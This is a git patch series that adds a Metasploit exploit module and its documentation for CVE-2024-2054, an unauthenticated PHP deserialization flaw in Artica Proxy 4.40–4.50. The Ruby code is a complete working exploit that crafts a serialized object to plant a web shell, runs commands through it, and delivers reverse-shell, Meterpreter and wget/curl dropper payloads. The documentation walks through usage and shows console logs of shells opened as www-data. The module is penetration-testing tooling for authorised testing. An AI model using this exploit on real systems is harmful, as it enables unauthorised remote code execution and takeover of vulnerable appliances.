From df0012a63f2a1596e93b0a2bedd94ebaf1aef4ff Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Fri, 15 Mar 2024 16:10:05 +0000 Subject: [PATCH 1/4] initial release module --- .../artica_proxy_unauth_rce_cve_2024_2054.rb | 197 ++++++++++++++++++ 1 file changed, 197 insertions(+) create mode 100644 modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb diff --git a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb new file mode 100644 index 000000000000..bfb96b85ea67 --- /dev/null +++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb @@ -0,0 +1,197 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::FileDropper + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Artica Proxy Unauthenticated PHP Deserialization Vulnerability', + 'Description' => %q{ + A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows + remote attackers to run arbitrary commands via unauthenticated HTTP request. + The Artica Proxy administrative web application will deserialize arbitrary PHP objects + supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'h00die-gr3y ', # MSF module contributor + 'Jaggar Henry of KoreLogic Inc.' # Discovery of the vulnerability + ], + 'References' => [ + ['CVE', '2024-2054'], + ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-2054'], + ['PACKETSTORM', '177482'] + ], + 'DisclosureDate' => '2024-03-05', + 'Platform' => ['php', 'unix', 'linux'], + 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86], + 'Privileged' => false, + 'Targets' => [ + [ + 'PHP', + { + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Type' => :php, + 'DefaultOptions' => { + 'PAYLOAD' => 'php/meterpreter/reverse_tcp' + } + } + ], + [ + 'Unix Command', + { + 'Platform' => ['unix', 'linux'], + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_bash' + } + } + ], + [ + 'Linux Dropper', + { + 'Platform' => ['linux'], + 'Arch' => [ARCH_X64, ARCH_X86], + 'Type' => :linux_dropper, + 'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'], + 'Linemax' => 16384, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' + } + } + ] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'SSL' => true, + 'RPORT' => 9000 + }, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + ) + ) + register_options([ + OptString.new('TARGETURI', [ true, 'The Artica Proxy endpoint URL', '/' ]), + OptString.new('WEBSHELL', [false, 'Web shell name without extension. Name will be randomly generated if left unset.', nil]), + OptEnum.new('COMMAND', + [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0]) + ]) + end + + def execute_php(cmd, _opts = {}) + payload = Base64.strict_encode64(cmd) + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'wizard', @webshell_name), + 'ctype' => 'application/x-www-form-urlencoded', + 'vars_post' => { + @post_param => payload + } + }) + end + + def execute_command(cmd, _opts = {}) + payload = Base64.strict_encode64(cmd) + php_cmd_function = datastore['COMMAND'] + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'wizard', @webshell_name), + 'ctype' => 'application/x-www-form-urlencoded', + 'vars_get' => { + @get_param => php_cmd_function + }, + 'vars_post' => { + @post_param => payload + } + }) + end + + def upload_webshell + # randomize file name if option WEBSHELL is not set + @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php") + @webshell_full_path = "/usr/share/artica-postfix/wizard/#{@webshell_name}" + + @post_param = Rex::Text.rand_text_alphanumeric(1..8) + @get_param = Rex::Text.rand_text_alphanumeric(1..8) + + # Upload webshell with PHP payload + if target['Type'] == :php + php_payload = "" + else + php_payload = "" + end + + php_payload_len = php_payload.length + webshell_full_path_len = @webshell_full_path.length + final_payload = "O:19:\"Net_DNS2_Cache_File\":4:{s:10:\"cache_file\";s:#{webshell_full_path_len}:\"#{@webshell_full_path}\";s:16:\"cache_serializer\";s:4:\"json\";s:10:\"cache_size\";i:9999999999;s:10:\"cache_data\";a:1:{s:#{php_payload_len}:\"#{php_payload}\";a:2:{s:10:\"cache_date\";i:0;s:3:\"ttl\";i:9999999999;}}}" + final_payload_b64 = Base64.strict_encode64(final_payload) + + return send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'wizard', 'wiz.wizard.progress.php'), + 'ctype' => 'application/x-www-form-urlencoded', + 'vars_get' => { + 'build-js' => final_payload_b64 + } + }) + end + + def check + print_status("Checking if #{peer} can be exploited.") + res = send_request_cgi!({ + 'method' => 'GET', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path) + }) + return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 + + # Check if target is an Artica Proxy appliance + # Search for the Artica Version tag on the login page + html = res.get_html_document + unless html.blank? + version_match = html.text.match(/Artica.{1,2}\d\.\d\d/) + return CheckCode::Unknown('No Artica version found.') if version_match.nil? + + version = version_match[0].split(' ') + if Rex::Version.new(version[1]) <= Rex::Version.new('4.50') + return CheckCode::Vulnerable("Artica version: #{version[1]}") + else + return CheckCode::Safe("Artica version: #{version[1]}") + end + end + CheckCode::Unknown + end + + def exploit + print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") + res = upload_webshell + fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 500 + register_file_for_cleanup(@webshell_full_path) + + case target['Type'] + when :php + execute_php(payload.encoded) + when :unix_cmd + execute_command(payload.encoded) + when :linux_dropper + # Don't check the response here since the server won't respond + # if the payload is successfully executed. + execute_cmdstager({ linemax: target.opts['Linemax'] }) + end + end +end From 5dd75e174b42cf6fb49dff30d79250ec8a38418d Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Fri, 15 Mar 2024 18:27:59 +0000 Subject: [PATCH 2/4] second release module and documentation --- .../artica_proxy_unauth_rce_cve_2024_2054.md | 209 ++++++++++++++++++ .../artica_proxy_unauth_rce_cve_2024_2054.rb | 4 +- 2 files changed, 211 insertions(+), 2 deletions(-) create mode 100644 documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md diff --git a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md new file mode 100644 index 000000000000..7f1bfc71e92c --- /dev/null +++ b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md @@ -0,0 +1,209 @@ +## Vulnerable Application + +A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows remote attackers +to run arbitrary commands via unauthenticated HTTP request. +The Artica Proxy administrative web application will de-serialize arbitrary PHP objects +supplied by unauthenticated users and subsequently enable code execution as the `www-data` user. + +## Installation steps to install Artica Proxy appliance +* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform. +* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/). +* Download the Artica Proxy iso image from [here](https://sourceforge.net/projects/artica-squid/files/ISO/). +* Install the iso image in your virtualization engine. +* When installed, configure the VM appliance to your needs using the menu options. +* Boot up the VM and should be able to access the Artica appliance. +* Either thru the console, `ssh` on port `22` or via the `webui` via `https://your_articaproxy_ip:9000`. + +You are now ready to test the module. + +## Verification Steps + +- [ ] Start `msfconsole` +- [ ] `use exploit/linux/http//artica_proxy_unauth_rce_cve_2024_2054` +- [ ] `set rhosts ` +- [ ] `set rport ` +- [ ] `set webshell cuckoo` +- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>` +- [ ] `exploit` +- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings + +## Options + +### WEBSHELL +You can use this option to set the filename without extension of the webshell. +This is handy if you want to test the webshell upload and execution with different file names. +to bypass any security settings on the Web and PHP server. + +### COMMAND +This option provides the user to choose the PHP underlying shell command function to be used for execution. +The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`. +This option is only available when the target selected is either Unix Command or Linux Dropper. +For the native PHP target, by default the `eval()` function will be used for native PHP code execution. + +## Scenarios + +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > info + + Name: Artica Proxy Unauthenticated PHP Deserialization Vulnerability + Module: exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054 + Platform: PHP, Unix, Linux + Arch: php, cmd, x64, x86 + Privileged: No + License: Metasploit Framework License (BSD) + Rank: Excellent + Disclosed: 2024-03-05 + +Provided by: + h00die-gr3y + Jaggar Henry of KoreLogic Inc. + +Module side effects: + ioc-in-logs + artifacts-on-disk + +Module stability: + crash-safe + +Module reliability: + repeatable-session + +Available targets: + Id Name + -- ---- + => 0 PHP + 1 Unix Command + 2 Linux Dropper + +Check supported: + Yes + +Basic options: + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba + sics/using-metasploit.html + RPORT 9000 yes The target port (TCP) + SSL true no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI / yes The Artica Proxy endpoint URL + URIPATH no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + WEBSHELL no Set webshell name without extension. Name will be randomly generated if left un + set. + + + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on t + he local machine or 0.0.0.0 to listen on all addresses. + SRVPORT 1981 yes The local port to listen on. + + + When TARGET is not 0: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + COMMAND passthru yes Use PHP command function (Accepted: passthru, shell_exec, system, exec) + +Payload information: + +Description: + A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows + remote attackers to run arbitrary commands via unauthenticated HTTP request. + The Artica Proxy administrative web application will deserialize arbitrary PHP objects + supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. + +References: + https://nvd.nist.gov/vuln/detail/CVE-2024-2054 + https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054 + https://packetstormsecurity.com/files/177482 + + +View the full module info with the info -d command. +``` + +### Target 0 - PHP native `php/meterpreter/reverse_tcp` session +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set webshell cuckoo +webshell => cuckoo +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 0 +target => 0 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set rhosts 192.168.201.4 +rhosts => 192.168.201.4 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set lhost 192.168.201.8 +lhost => 192.168.201.8 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit + +[*] Started reverse TCP handler on 192.168.201.8:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.201.4:9000 can be exploited. +[+] The target is vulnerable. Artica version: 4.50 +[*] Executing PHP for php/meterpreter/reverse_tcp +[*] Sending stage (39927 bytes) to 192.168.201.4 +[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php +[*] Meterpreter session 15 opened (192.168.201.8:4444 -> 192.168.201.4:33986) at 2024-03-15 17:46:04 +0000 + +meterpreter > sysinfo +Computer : artica-applianc +OS : Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64 +Meterpreter : php/linux +meterpreter > getuid +Server username: www-data +meterpreter > +``` +### Target 1 - Unix Command `cmd/unix/reverse_bash` session +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1 +target => 1 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit + +[*] Started reverse TCP handler on 192.168.201.8:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.201.4:9000 can be exploited. +[+] The target is vulnerable. Artica version: 4.50 +[*] Executing Unix Command for cmd/unix/reverse_bash +[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php +[*] Command shell session 16 opened (192.168.201.8:4444 -> 192.168.201.4:46286) at 2024-03-15 17:48:40 +0000 + +uname -a +Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64 GNU/Linux +id +uid=33(www-data) gid=33(www-data) groups=33(www-data) +``` +### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2 +target => 2 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit + +[*] Started reverse TCP handler on 192.168.201.8:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.201.4:9000 can be exploited. +[+] The target is vulnerable. Artica version: 4.50 +[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp +[*] Using URL: http://192.168.201.8:1981/U835crbue3yBo +[*] Client 192.168.201.4 (Wget/1.20.1 (linux-gnu)) requested /U835crbue3yBo +[*] Sending payload to 192.168.201.4 (Wget/1.20.1 (linux-gnu)) +[*] Sending stage (3045380 bytes) to 192.168.201.4 +[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php +[*] Meterpreter session 17 opened (192.168.201.8:4444 -> 192.168.201.4:35246) at 2024-03-15 17:50:04 +0000 +[*] Command Stager progress - 100.00% done (119/119 bytes) +[*] Server stopped. + +meterpreter > sysinfo +Computer : artica-applianc.domain.tld +OS : Debian 10.13 (Linux 4.19.0-24-amd64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > getuid +Server username: www-data +meterpreter > +``` + +## Limitations +No limitations. diff --git a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb index bfb96b85ea67..3a54dd70ed1c 100644 --- a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb +++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb @@ -29,7 +29,7 @@ def initialize(info = {}) ], 'References' => [ ['CVE', '2024-2054'], - ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-2054'], + ['URL', 'https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054'], ['PACKETSTORM', '177482'] ], 'DisclosureDate' => '2024-03-05', @@ -87,7 +87,7 @@ def initialize(info = {}) ) register_options([ OptString.new('TARGETURI', [ true, 'The Artica Proxy endpoint URL', '/' ]), - OptString.new('WEBSHELL', [false, 'Web shell name without extension. Name will be randomly generated if left unset.', nil]), + OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]), OptEnum.new('COMMAND', [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0]) ]) From e84fe947c23887fe8fd5f126d6dcf0bc18f67ec8 Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Fri, 15 Mar 2024 23:33:29 +0000 Subject: [PATCH 3/4] third release module and documentation updates --- .../linux/http/artica_proxy_unauth_rce_cve_2024_2054.md | 8 ++++++-- .../linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb | 6 +++--- 2 files changed, 9 insertions(+), 5 deletions(-) diff --git a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md index 7f1bfc71e92c..0f6abc7a4438 100644 --- a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md +++ b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md @@ -1,10 +1,14 @@ ## Vulnerable Application -A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows remote attackers -to run arbitrary commands via unauthenticated HTTP request. +A Command Injection vulnerability in Artica Proxy appliance version `4.50` and `4.40` +allows remote attackers to run arbitrary commands via unauthenticated HTTP request. The Artica Proxy administrative web application will de-serialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the `www-data` user. +This module has been tested with: +* Artica Proxy Appliance 4.50 running in VirtualBox 7.0.14 r161095 (Qt5.15.2) +* Artica Proxy Appliance 4.40 Service Pack 118 running in VirtualBox 7.0.14 r161095 (Qt5.15.2) + ## Installation steps to install Artica Proxy appliance * Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform. * Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/). diff --git a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb index 3a54dd70ed1c..bd0099590364 100644 --- a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb +++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb @@ -17,8 +17,8 @@ def initialize(info = {}) info, 'Name' => 'Artica Proxy Unauthenticated PHP Deserialization Vulnerability', 'Description' => %q{ - A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows - remote attackers to run arbitrary commands via unauthenticated HTTP request. + A Command Injection vulnerability in Artica Proxy appliance version 4.50 and 4.40 + allows remote attackers to run arbitrary commands via unauthenticated HTTP request. The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. }, @@ -168,7 +168,7 @@ def check return CheckCode::Unknown('No Artica version found.') if version_match.nil? version = version_match[0].split(' ') - if Rex::Version.new(version[1]) <= Rex::Version.new('4.50') + if Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40') return CheckCode::Vulnerable("Artica version: #{version[1]}") else return CheckCode::Safe("Artica version: #{version[1]}") From f217312ad1beab521059c172cd23fb8caa661618 Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Thu, 21 Mar 2024 16:13:55 +0000 Subject: [PATCH 4/4] module and documentation updates based on review comments (bwatters-r7/cgranleese-r7) --- .../linux/http/artica_proxy_unauth_rce_cve_2024_2054.md | 8 ++++---- .../linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md index 0f6abc7a4438..8dc78ef2a668 100644 --- a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md +++ b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md @@ -46,7 +46,7 @@ For the native PHP target, by default the `eval()` function will be used for nat ## Scenarios -```shell +```msf msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > info Name: Artica Proxy Unauthenticated PHP Deserialization Vulnerability @@ -131,7 +131,7 @@ View the full module info with the info -d command. ``` ### Target 0 - PHP native `php/meterpreter/reverse_tcp` session -```shell +```msf msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set webshell cuckoo webshell => cuckoo msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 0 @@ -160,7 +160,7 @@ Server username: www-data meterpreter > ``` ### Target 1 - Unix Command `cmd/unix/reverse_bash` session -```shell +```msf msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1 target => 1 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit @@ -179,7 +179,7 @@ id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` ### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session -```shell +```msf msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2 target => 2 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit diff --git a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb index bd0099590364..60da6cee5469 100644 --- a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb +++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb @@ -168,7 +168,7 @@ def check return CheckCode::Unknown('No Artica version found.') if version_match.nil? version = version_match[0].split(' ') - if Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40') + if version.count > 1 && Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40') return CheckCode::Vulnerable("Artica version: #{version[1]}") else return CheckCode::Safe("Artica version: #{version[1]}")